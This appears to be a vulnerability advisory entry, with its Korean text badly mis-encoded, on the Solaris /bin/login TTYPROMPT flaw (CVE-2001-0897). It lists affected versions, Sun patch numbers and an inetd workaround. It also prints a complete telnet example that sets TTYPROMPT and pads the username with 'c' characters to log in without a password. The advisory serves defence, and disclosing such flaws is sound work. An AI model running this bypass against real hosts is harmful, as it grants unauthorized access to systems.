English
¢¸¢· µÚ·Î
Ãë¾àÁ¡ID 14029
À§Çèµµ 40
Æ÷Æ® 23
ÇÁ·ÎÅäÄÝ TCP
ºÐ·ù TELNET
»ó¼¼¼³¸í Solaris 2.6, 7°ú 8¿¡ ÀÖ´Â /bin/loginÀº ȯ°æº¯¼ö TTYPROMPT¿Í °ü·ÃµÈ Ãë¾àÁ¡À» °¡Áö°í ÀÖ´Ù. ÀÌ Ãë¾àÁ¡Àº ¿ø°ÝÁöÀÇ °ø°ÝÀÚ°¡ ¾î¶°ÇÑ ÀÎÁõÁ¤º¸¸¦ °¡Áö°í ÀÖÁö ¾Ê´õ¶óµµ ¿ø°Ý root ·Î±×ÀÎÀÌ Çã¿ëµÇ¾î ÀÖ´Ù¸é root¸¦ Æ÷ÇÔÇÑ ¾î¶² »ç¿ëÀڷεµ ·ÎÄà ¾×¼¼½º¸¦ ¾òÀ» ¼ö ÀÖ°Ô ÇØ ÁØ´Ù.
ÀÌ Ãë¾àÁ¡Àº BugTraq ¸ÞÀϸµ ¸®½ºÆ®¿¡ ÀÌ¹Ì º¸°íµÇ¾î ÀÖ¾ú°í ¶ÇÇÑ Sun¿¡ ÀÇÇØ ¸±¸®ÁîµÈ ÆÐÄ¡°¡ Á¸ÀçÇÑ´Ù. ±×·¯³ª °ø°ÝÀÚ¿¡ ÀÇÇØ ÄÄÆÄÀϵǾî¾ß ÇÏ´Â ¾î¶² Äڵ嵵 ÇÊ¿ä¾ø´Â ¸Å¿ì °£´ÜÇÑ ÇØÅ·¹æ¹ýÀÌ Á¸ÀçÇÑ´Ù.
ÀÌ ÇØÅ·¹æ¹ýÀº ¸ÕÀú °ø°ÝÀÚ°¡ telnet ³»ºÎÀÇ È¯°æº¯¼öÀÎ TTYPROMPT¸¦ 6 ¹®ÀÚÀÇ ¹®ÀÚ¿­·Î °£´ÜÇÏ°Ô ¼³Á¤ÇÏ´Â ÀÛ¾÷ÀÌ ÇÊ¿äÇÏ´Ù. ÀÏ´Ü ¿ø°ÝÁöÀÇ È£½ºÆ®¿¡ Á¢¼ÓµÇ¸é 64°³ÀÇ 'c' ¿Í ¿£Æ®Å°('\n')°¡ µû¸£´Â »ç¿ëÀÚ¸íÀ» ŸÀÌÇÁÇØ¾ß ÇÑ´Ù. ±×·¯¸é ÆÐ½º¿öµå ÀÎÁõ¾øÀÌ ÇØ´ç »ç¿ëÀÚ·Î ·Î±×ÀεǾî Áú °ÍÀÌ´Ù. À̰ÍÀº (¿ø°Ý root ·Î±×ÀÎÀÎ Çã¿ëµÇ¾î ÀÖÁö ¾Ê´Ù¸é) root¸¦ Á¦¿ÜÇÑ ¾î¶² °èÁ¤À¸·Îµµ °¡´ÉÇÏ´Ù.

¿¹:

coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c (continue)
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin

Ãë¾àÇÑ Ç÷§Æû:
Sun Solaris 2.5.1
Sun Solaris 2.6
Sun Solaris 7.0
Sun Solaris 8.0

* Âü°í »çÀÌÆ®:
http://www.iss.net/security_center/static/7284.php
ÇØ°áÃ¥ ´ÙÀ½ Sun »çÀÇ SubSolve ÆÐÄ¡ À¥»çÀÌÆ®¿¡¼­ ½Ã½ºÅÛ¿¡ ÀûÀýÇÑ ÆÐÄ¡¸¦ ±¸ÇÏ¿© Àû¿ëÇÏ¿©¾ß ÇÑ´Ù:

SPARC:
Solaris 2.5.1: patch 106160-02 ȤÀº ÀÌÈÄ
Solaris 2.6: patch 105665-04 ȤÀº ÀÌÈÄ
Solaris 7: patch 112300-01 ȤÀº ÀÌÈÄ
Solaris 8: patch 111085-02 ȤÀº ÀÌÈÄ

Intel:
Solaris 2.5.1: patch 106161-02 ȤÀº ÀÌÈÄ
Solaris 2.6: patch 105666-04 ȤÀº ÀÌÈÄ
Solaris 7: patch 112301-01 ȤÀº ÀÌÈÄ
Solaris 8: patch 111086-02 ȤÀº ÀÌÈÄ

ÆÐÄ¡¸¦ À§Çؼ­´Â patchadd ¸í·ÉÀ» »ç¿ëÇÏ¿©¾ß ÇÑ´Ù. ¸®ºÎÆÃÀº ÇÊ¿äÇÏÁö ¾Ê´Ù.

Àӽà Á¶Ä¡¹æ¹ýÀ¸·Î´Â /bin/loginÀ» ÅëÇØ ¿ø°ÝÀ¸·Î ÇØÅ·µÇ¾îÁú ¼ö ÀÖ´Â telnet ¼­¹ö¸¦ ÀÛµ¿ÁßÁö ½ÃŰ´Â °ÍÀÌ´Ù. ÀÌ·¸°Ô Çϱâ À§Çؼ­´Â /etc/inetd.conf ÆÄÀÏ¿¡ ÀÖ´Â °ü·Ã ¿£Æ®¸®¸¦ ÁÖ¼®Ã³¸®Çϰí inetd¸¦ Àç½ÃÀÛ½ÃÄÑ¾ß ÇÑ´Ù.
°ü·Ã URL CVE-2001-0897 (CVE)
°ü·Ã URL (SecurityFocus)
°ü·Ã URL (ISS)